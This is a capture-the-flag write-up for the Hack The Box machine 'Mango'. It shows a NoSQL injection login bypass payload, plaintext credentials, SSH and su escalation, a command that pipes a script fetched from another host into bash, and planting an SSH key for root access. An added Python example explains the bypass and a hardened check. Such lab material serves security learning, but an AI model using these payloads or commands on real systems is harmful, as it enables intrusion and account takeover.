HTB Mango Writeup

Mango is a good Linux-based machine for improving your enumeration skills; you might learn some new things from it.

Enumeration

nmap -sC -sV 10.10.10.162

Opening the host in our browser on port 80, we are presented with a 403 Forbidden error, so we tried opening the host on 443 and got this.

This looks like a search engine, so let’s check the source code.
After looking at the source code we couldn’t find anything there.
Let’s check the nmap report again.

| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN

We add this hostname to our /etc/hosts:
$ echo "10.10.10.162 staging-order.mango.htb" >> /etc/hosts

Now we can browse to http://staging-order.mango.htb/
Here we can see a login panel like this.

Trying random credentials got us nothing.
Here, mango could be wordplay on MongoDB.
MongoDB is a NoSQL database, so to exploit it we need to search for "mongoDB NoSQL".
To confirm this we went to this GitHub repo and tried an authentication bypass.

Basic authentication bypass using not equal ($ne) or greater ($gt)

username[$ne]=admin&password[$ne]=admin

In response we got HTTP/1.1 302 Found
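
Why the bypass above works, and the server-side check that stops it, shown as an added example that is not part of the original writeup or the target's code. It assumes the login handler parses bracketed form keys into nested objects and passes them unchanged into a MongoDB-style query; the function names and the USERS record are constructed for illustration.

```python
from urllib.parse import parse_qsl

# Constructed sample record standing in for the application's user collection.
USERS = [{"username": "alice", "password": "correct-horse"}]

def parse_bracket_form(body):
    """Parse a form body the way bracket-aware parsers do: key[sub]=v -> {key: {sub: v}}."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            name, sub = key[:-1].split("[", 1)
            if not isinstance(out.get(name), dict):
                out[name] = {}
            out[name][sub] = value
        else:
            out[key] = value
    return out

def matches(doc, query):
    """Minimal model of MongoDB matching: equality plus the $ne and $gt operators."""
    for field, cond in query.items():
        actual = doc.get(field)
        if isinstance(cond, dict):
            for op, operand in cond.items():
                if op == "$ne":
                    if actual == operand:
                        return False
                elif op == "$gt":
                    if actual is None or not actual > operand:
                        return False
                else:
                    return False  # operator not modelled in this sketch
        elif actual != cond:
            return False
    return True

def login_vulnerable(body):
    params = parse_bracket_form(body)
    # Parsed values go straight into the query document, operators included.
    query = {"username": params.get("username"), "password": params.get("password")}
    return any(matches(user, query) for user in USERS)

def login_hardened(body):
    params = parse_bracket_form(body)
    username, password = params.get("username"), params.get("password")
    # Accept plain strings only, so {"$ne": ...} never reaches the query.
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    return any(matches(user, {"username": username, "password": password}) for user in USERS)
```

With the payload from this section, login_vulnerable matches the stored record without knowing any password, while login_hardened rejects the request before a query is built.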


After searching about it we came across a GitHub repository that can enumerate usernames and passwords of web applications vulnerable to NoSQL (MongoDB) injection.

After running the script we now have 2 credentials:
admin:t9KcS3>!0B#2
mango:h3mXK8RhU~f{]f5H

We can connect as the user mango over SSH with the password we got earlier.

#ssh mango@10.10.10.162
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
Support: https://ubuntu.com/advantage
System information as of Fri Apr 17 05:33:13 UTC 2020
System load: 0.12 Processes: 117
Usage of /: 25.9% of 19.56GB Users logged in: 1
Memory usage: 16% IP address for ens33: 10.10.10.162
Swap usage: 4%
Canonical Livepatch is available for installation.
Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 17 05:14:54 2020 from 10.10.15.51

We got the shell.
There is nothing here for this user and we can’t find any user flag. We checked the home folder to find the flag under the other user, but we couldn’t get into it.
But we have an admin password, so let’s try to switch from mango to admin with the password we got previously.
su admin
It worked.

mango@mango:~$ su admin
Password:
$ whoami
admin
$ cat /home/admin/user.txt
79bf3[redacted]47e92

Now the main part is to get the root flag.
To get an idea for privilege escalation we can run LinEnum here.
curl 10.10.15.51:80/LinEnum.sh | bash
Reading the output of LinEnum, we saw this line.

We searched about this on Google and saw this.
We can print root.txt from this.

We got the root flag, but we still don’t have a root shell. We can write our SSH public key to authorized_keys to get SSH access as root.

Alternate

You can print root.txt or get a root shell by using the -scripting flag.

To get a shell you can use the same method.

Here we got our root shell.

Hope you like it.
